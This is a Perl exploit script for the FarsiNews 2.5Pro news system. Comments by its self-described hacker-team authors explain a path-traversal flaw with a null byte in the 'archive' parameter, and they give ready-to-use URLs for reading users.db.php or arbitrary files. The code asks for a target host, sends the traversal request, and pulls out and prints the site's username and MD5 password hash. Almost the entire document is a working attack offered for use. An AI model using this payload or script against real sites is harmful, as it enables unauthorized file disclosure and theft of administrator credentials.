#!/usr/bin/perl # << HESSAM-X >> # FarsiNews 2.5Pro Exploi # Exploit by Hessam-x (www.hessamx.net) #Iran Hackerz Security Team #WebSite: www.hackerz.ir # # Summery # Name : FarsiNews [www.farsinewsteam.com] # version : 2.5Pro ###################################################### # in FarsiNews if you change the archive value : # http://localhost/index.php?archive=hamid # see : # Warning: file([PATH]/data/archives/hamid.news.arch.php): # failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 642 # Warning: file([PATH]/data/archives/hamid.comments.arch.php): # failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 686 # ...[and many other error] # it means that shows.inc.php try to open '/archives/hamid.news.arch.php' (and also 'hamid.comments.arch.php') to read it's data . # we can change the archive value to '/../users.db.php%00' to see all username and password . # Exploit : # http://localhost/index.php?archive=/../users.db.php%00 # http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00 # F0und by hamid use LWP::Simple; print "-------------------------------------------\n"; print "= Farsinews 2.5Pro =\n"; print "= By Hessam-x - www.hackerz.ir =\n"; print "-------------------------------------------\n\n"; print "Target(www.example.com)\> "; chomp($targ = <STDIN>); print "Path: (/fn25/)\>"; chomp($path=<STDIN>); $url = "index.php?archive=/../users.db.php%00"; $page = get("http://".$targ.$path.$url) || die "[-] Unable to retrieve: $!"; print "[+] Connected to: $targ\n"; $page =~ m/<img alt="(.*?)" src=/ && print "[+] Username: $1\n"; $page =~ m/style="border: none;" align="right" \/>(.*?)<\/font>/ && print "[+] MD5 Password: $1\n"; print "[-] Unable to retrieve User ID\n" if(!$1);
